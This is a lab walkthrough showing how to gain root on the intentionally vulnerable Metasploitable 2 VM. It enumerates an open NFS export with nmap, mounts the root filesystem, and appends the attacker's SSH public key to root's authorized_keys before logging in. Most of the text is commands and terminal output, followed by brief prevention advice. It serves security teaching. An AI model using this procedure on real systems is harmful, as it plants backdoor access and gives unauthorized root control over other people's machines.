NFS is a Network File Sharing protocol that allows users to share directories and files over the network across different operating systems. In addition, it will enable remote systems to be accessible locally when the shares are mounted. The accessibility of the NFS shares is based on whatever privileges are assigned to the share.
Goal: Gain unauthorized access to sensitive data or obtain a shell on the system.
From the previous chapter, we have found out that ports: 111 and 2049 ports are open.
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2 (RPC #100000)
2049/tcp open nfs 2-4 (RPC #100003)
Let's again, examine the Metasploitable 2 server with the help of the Nmap scripting engine:
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo nmap -sC -sV --script=nfs-ls 192.168.56.3 -p 111,2049
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 16:16 IST
Nmap scan report for 192.168.56.3
Host is up (0.0017s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2 (RPC #100000)
| nfs-ls: Volume /
| access: Read Lookup Modify Extend Delete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:33 bin
| drwxr-xr-x 0 0 4096 2010-04-16T06:16:02 home
| drwxr-xr-x 0 0 4096 2010-03-16T22:57:40 initrd
| lrwxrwxrwx 0 0 32 2010-04-28T20:26:18 initrd.img
| drwxr-xr-x 0 0 4096 2012-05-14T03:35:22 lib
| drwx------ 0 0 16384 2010-03-16T22:55:15 lost+found
| drwxr-xr-x 0 0 4096 2010-03-16T22:55:52 media
| drwxr-xr-x 0 0 4096 2010-04-28T20:16:56 mnt
| drwxr-xr-x 0 0 4096 2012-05-14T01:54:53 sbin
| drwxr-xr-x 0 0 4096 2010-04-28T04:06:37 usr
|_
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 36117/udp mountd
| 100005 1,2,3 48262/tcp mountd
| 100021 1,3,4 34178/udp nlockmgr
| 100021 1,3,4 39330/tcp nlockmgr
| 100024 1 36509/tcp status
|_ 100024 1 43134/udp status
2049/tcp open nfs 2-4 (RPC #100003)
MAC Address: 08:00:27:52:1E:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.45 seconds
┌─[mrdev@mr-dev]─[~]
└──╼ $
We see that both of them are open, and on port 111, a “/” directory is shown under NFS mount that we can try to mount. The “/” file system is usually owned by the root. If we are allowed to mount to the “/” path, we will be able to read root files and maybe write as well.
Mounting the '/' share
Let’s start mounting the “/” share and see what type of privileges we have.
1. We will first start with creating a new directory locally in the “/mnt” directory, and I’ll call it metasploitable_share for the sake of this demo.
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo mkdir -p /mnt/metasploitabe_share
[sudo] password for mrdev:
┌─[mrdev@mr-dev]─[~]
└──╼ $cd /mnt/
┌─[mrdev@mr-dev]─[/mnt]
└──╼ $ls
total 4
drwxr-xr-x 1 root root 40 Jan 20 18:10 .
drwxr-xr-x 1 root root 292 Jan 12 21:05 ..
drwxr-xr-x 21 root root 4096 May 21 2012 metasploitable_share
2. Mount the remote the NFS share “/” locally with the mount utility on Linux. Before that make sure you have enabled the superuser privileges:
┌─[mrdev@mr-dev]─[/mnt]
└──╼ $sudo su
┌─[✗]─[root@mr-dev]─[/mnt]
└──╼ #sudo mount -t nfs 192.168.56.3:/ /mnt/metasploitable_share/
┌─[root@mr-dev]─[/mnt]
└──╼ #
3. On successful mount, you can list the directories and files on metasploitable_share directory:
┌─[root@mr-dev]─[/mnt]
└──╼ #cd metasploitable_share/
┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #ls -al
total 124
drwxr-xr-x 21 root root 4096 May 21 2012 .
drwxr-xr-x 1 root root 40 Jan 20 18:10 ..
drwxr-xr-x 2 root root 4096 May 14 2012 bin
drwxr-xr-x 3 root root 4096 Apr 29 2010 boot
lrwxrwxrwx 1 root root 11 Apr 29 2010 cdrom -> media/cdrom
drwxr-xr-x 2 root root 4096 Apr 29 2010 dev
drwxr-xr-x 94 root root 4096 Jan 20 14:55 etc
drwxr-xr-x 6 root root 4096 Apr 16 2010 home
drwxr-xr-x 2 root root 4096 Mar 17 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 29 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 14 2012 lib
drwx------ 2 root root 16384 Mar 17 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 17 2010 media
drwxr-xr-x 3 root root 4096 Apr 29 2010 mnt
-rw------- 1 root root 31056 Jan 20 14:55 nohup.out
drwxr-xr-x 2 root root 4096 Mar 17 2010 opt
dr-xr-xr-x 2 root root 4096 Apr 29 2010 proc
drwxr-xr-x 13 root root 4096 Jan 20 14:55 root
drwxr-xr-x 2 root root 4096 May 14 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 17 2010 srv
drwxr-xr-x 2 root root 4096 Apr 29 2010 sys
drwxrwxrwt 6 root root 4096 Jan 20 16:55 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 14 root root 4096 Mar 17 2010 var
lrwxrwxrwx 1 root root 29 Apr 29 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #
4. Let's change the directories to ".ssh " and list the files and directories:
┌─[root@mr-dev]─[/mnt/metasploitable_share]
└──╼ #cd root/.ssh/
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #ls -al
total 16
drwxr-xr-x 2 root root 4096 May 20 2012 .
drwxr-xr-x 13 root root 4096 Jan 20 14:55 ..
-rw-r--r-- 1 root root 405 May 18 2010 authorized_keys
-rw-r--r-- 1 root root 442 May 20 2012 known_hosts
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #
From the above, we have found that there is an authorized_keys:
An authorized key in SSH is a public key used for granting login access to users. The authentication mechanism is called public-key authentication. Authorized keys are configured separately for each user - usually in the . ssh/authorized_keys file in the user's home directory.
So, we have to generate an SSH key pair locally on the testing machine.
5. Open a terminal and run the below command to generate SSH key pair.
┌─[mrdev@mr-dev]─[~]
└──╼ $sudo su # To enable sudo privileges
[sudo] password for mrdev:
┌─[root@mr-dev]─[/home/mrdev]
└──╼ #cd /mnt/ # Change directory to /mnt
┌─[root@mr-dev]─[/mnt]
└──╼ #ssh-keygen -t rsa # Generate SSH key_pair
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): meta2_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in meta2_rsa
Your public key has been saved in meta2_rsa.pub
The key fingerprint is:
SHA256:1V9dnse3V9W8DfBkdIAF/PmM01NqcSP/zGFfVAwuyrY root@mr-dev
The key's randomart image is:
+---[RSA 3072]----+
| .o*B==|
| .o=.+X|
| . o.o+%|
| o . +++X|
| S + +@+|
| . . ==*|
| E ..+*|
| =|
| |
+----[SHA256]-----+
┌─[root@mr-dev]─[/mnt]
└──╼ #ls -al # Check if key_pair created or not
total 12
drwxr-xr-x 1 root root 84 Jan 20 18:27 .
drwxr-xr-x 1 root root 292 Jan 12 21:05 ..
-rw------- 1 root root 2590 Jan 20 18:27 meta2_rsa
-rw-r--r-- 1 root root 565 Jan 20 18:27 meta2_rsa.pub
drwxr-xr-x 21 root root 4096 May 21 2012 metasploitable_share
┌─[root@mr-dev]─[/mnt]
└──╼ #
6. Copy the meta2_rsa.pub file to the mounted share (/mnt/metasploitable_share/root/.ssh):
┌─[root@mr-dev]─[/mnt]
└──╼ #cp /mnt/meta2_rsa.pub /mnt/metasploitable_share/root/.ssh/
┌─[root@mr-dev]─[/mnt]
└──╼ #
7. Again go back to Terminal 1 and run ls to list the files and directories:
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #ls -al
total 20
drwxr-xr-x 2 root root 4096 Jan 20 18:30 .
drwxr-xr-x 13 root root 4096 Jan 20 14:55 ..
-rw-r--r-- 1 root root 405 May 18 2010 authorized_keys
-rw-r--r-- 1 root root 442 May 20 2012 known_hosts
-rw-r--r-- 1 root root 565 Jan 20 18:30 meta2_rsa.pub
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #
8. Dump the meta2_rsa.pub content to authorized_keys:
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #cat meta2_rsa.pub >> authorized_keys
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDkW7Nw2eHj4G7f0chXpYNhAt/WNMzGdBlajEtVRhInabT1LlG+hW+n1N8577B0Db/IpeKwElNXDcznp/VY9HNpNE4PuE+tx9IFjgt2TJMKOayfZKR5/CxP6Mx4LfN+iab3/CbKqRWYkdsE8L6jNzuyNXI1zSXjgOCx52/kTNMpRQS9UlR8tNSekODtygoho7fqseYZIkO0q/EF35t55xmmyhA75N2PeP8L0t+9lQVO5jrBf6tJAXocn+ORdRZpfTkDKzTpDQoGmjd2mq5m/JZ6O7CRYSP9qU5jz5KwfwF6gPrzmmySjMOJuBzLkql0Fk1mwNU1ZTsnKO0WdVoKC0zZnGg9TSQTVpe+O9EYSafx7SczI1Pf6BJYMk2uiK5/ipyzM6QQMQ3r/FYnoKA2NZUnzCwRlcq7WE0F9orJmu+dTmqCFH6oFhWewi/M9o5acirV313rgUKB8LQCTg/0zvx5rpfbbxUCkKW0sPx2wpkKSq+GYO8YvdlMfQCsRQvCXNs= root@mr-dev
┌─[root@mr-dev]─[/mnt/metasploitable_share/root/.ssh]
└──╼ #
9. Again go back to terminal 2, and Connect to the Metasploitable machine with the SSH key created earlier.
┌─[root@mr-dev]─[/mnt]
└──╼ #ssh -i meta2_rsa [email protected]
The authenticity of host '192.168.56.3 (192.168.56.3)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.3' (RSA) to the list of known hosts.
Last login: Thu Jan 20 04:25:40 2022 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
As we see, we can connect to the machine as root.
Prevention
- Place the appropriate restrictions on all NFS shares like restricting the IP addresses which can mount the exposed shares.
- Allow read-only access to the exported shares if possible.
- Do not export home directories.
- Use the “root_squash” option in the NFS setting to prevent remote root users from accessing the share with high privileges.
